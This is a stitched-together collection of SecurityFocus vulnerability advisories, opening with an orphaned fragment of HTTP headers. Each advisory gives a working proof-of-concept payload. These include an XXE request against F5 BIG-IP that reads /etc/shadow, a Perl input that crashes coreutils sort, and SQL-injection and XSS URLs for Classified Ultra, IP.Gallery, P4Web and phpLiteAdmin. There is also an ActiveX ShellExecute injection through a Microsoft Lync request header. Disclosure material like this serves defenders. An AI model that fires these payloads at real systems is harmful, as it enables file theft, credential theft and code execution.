HTTP/1.1
Host: www.example.com:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101
Firefox/17.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ar,es;q=0.8,en-us;q=0.5,en;q=0.3
Connection: keep-alive
Referer: https://www.example.com:8443/exampleext/control/main?externalLoginKey=EL367731470037
Cookie: JSESSIONID=C3E2C59FDC670DC004A562861681C092.jvm1; OFBiz.Visitor=10002
source: https://www.securityfocus.com/bid/57496/info
F5 Networks BIG-IP is prone to an XML External Entity injection vulnerability.
Attackers can exploit this issue to obtain potentially sensitive information from local files on computers running the vulnerable application and to carry out other attacks.
POST /sam/admin/vpe2/public/php/server.php HTTP/1.1
Host: bigip
Cookie: BIGIPAuthCookie=*VALID_COOKIE*
Content-Length: 143
<?xml version="1.0" encoding='utf-8' ?>
<!DOCTYPE a [<!ENTITY e SYSTEM '/etc/shadow'> ]>
<message><dialogueType>&e;</dialogueType></message>
The response includes the content of the file:
<?xml version="1.0" encoding="utf-8"?>
<message><dialogueType>any</dialogueType><status>generalError</status><command>any</command><accessPolicyName>any</accessPolicyName><messageBody><generalErrorText>Client
has sent unknown dialogueType '
root:--hash--:15490::::::
bin:*:15490::::::
daemon:*:15490::::::
adm:*:15490::::::
lp:*:15490::::::
mail:*:15490::::::
uucp:*:15490::::::
operator:*:15490::::::
nobody:*:15490::::::
tmshnobody:*:15490::::::
admin:--hash--:15490:0:99999:7:::
source: https://www.securityfocus.com/bid/57492/info
GNU Coreutils is prone to a buffer-overflow vulnerability because it fails to properly bounds check user-supplied input.
A local attacker can exploit this issue to crash the affected application, denying service to legitimate users. Due to the nature of this issue, arbitrary code-execution may be possible; however this has not been confirmed.
% perl -e 'print "1","A"x50000000,"\r\n\r\n"' | sort -d
[1] 13431 done perl -e 'print "1","A"x50000000,"\r\n\r\n"' |
13432 segmentation fault sort -d
% perl -e 'print "1","A"x50000000,"\r\n\r\n"' | sort -M
[1] 13433 done perl -e 'print "1","A"x50000000,"\r\n\r\n"' |
13434 segmentation fault sort -M
source: https://www.securityfocus.com/bid/57465/info
Classified Ultra is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
SQL-injection:
http://www.example.com/demos/classifiedultra/subclass.php?c=16'[SQLi HERE]
Cross-site scripting:
http://www.example.com/demos/classifiedultra/subclass.php?c=6&cname=Credit%20Cards[XSS HERE]
source: https://www.securityfocus.com/bid/57444/info
IP.Gallery is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
IP.Gallery 2.0.5 is vulnerable; other versions may also be affected.
http://www.example.com/index.php?automodule=gallery&cmd=si&img=[SQL]
source: https://www.securityfocus.com/bid/57300/info
Microsoft Lync is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to perform unauthorized actions on behalf of the victim.
GET /JW926520 HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/xaml+xml,
application/vnd.ms-xpsdocument, application/x-ms-xbap,
application/x-ms-application, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET
CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR
3.5.30729)";var oShell = new ActiveXObject("Shell.Application");var
commandtoRun =
"C:\\Windows\\notepad.exe";oShell.ShellExecute(commandtoRun,"","","open","1");-"
Host: meet.domainname.com
Connection: Keep-Alive
Cookie: LOCO=yes; icscontext=cnet; ProfileNameCookie=example
source: https://www.securityfocus.com/bid/57514/info
Perforce P4Web is prone to multiple cross site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Perforce P4Web versions 2011.1 and 2012.1 are vulnerable; other versions may also be affected.
http://www.example.com/u=Administrator&p=&c=+%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Submit=Log+In&orgurl=
http://www.example.com/cnm=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Updated=after&cdu=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&cow=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Accessed=after&cda=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&cho=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Show=Filter
http://www.example.com/@md=c&cd=//&cl=%22%3E%3Cimg%20src=x%20onerror=prompt%280%29;%3E&c=5q7@//?ac=81
http://www.example.com/unm=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Updated=after&udu=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Accessed=after&uda=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Show=Filter
http://www.example.com/filter=147&fileFilter=matching&pattern=+%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&showClient=showClient&Filter=Filter
http://www.example.com/goField=%2F%2F%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Go=Go
http://www.example.com/bnm=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Updated=after&bdu=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&bow=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Accessed=after&bda=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Show=Filter
http://www.example.com/lnm=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Updated=after&ldu=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&low=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Accessed=after&lda=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Show=Filter
http://www.example.com/Filter=+%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Asc=hi&Max=25&Show=Filter
http://www.example.com/Filter=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Asc=hi&Max=10&Jsf=Job&Jsf=Status&Jsf=User&Jsf=Date&Jsf=Description&Show=Filter
http://www.example.com/UpToVal=+%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&User=+%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Max=50&PatVal=...+%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Client=+%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&AllC=y&Show=Filter
source: https://www.securityfocus.com/bid/57431/info
phpLiteAdmin is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
phpLiteAdmin 1.8.x and 1.9.x are vulnerable.
http://www.example.com/phpliteadmin.php?action=row_view&table=' [ SQLi ]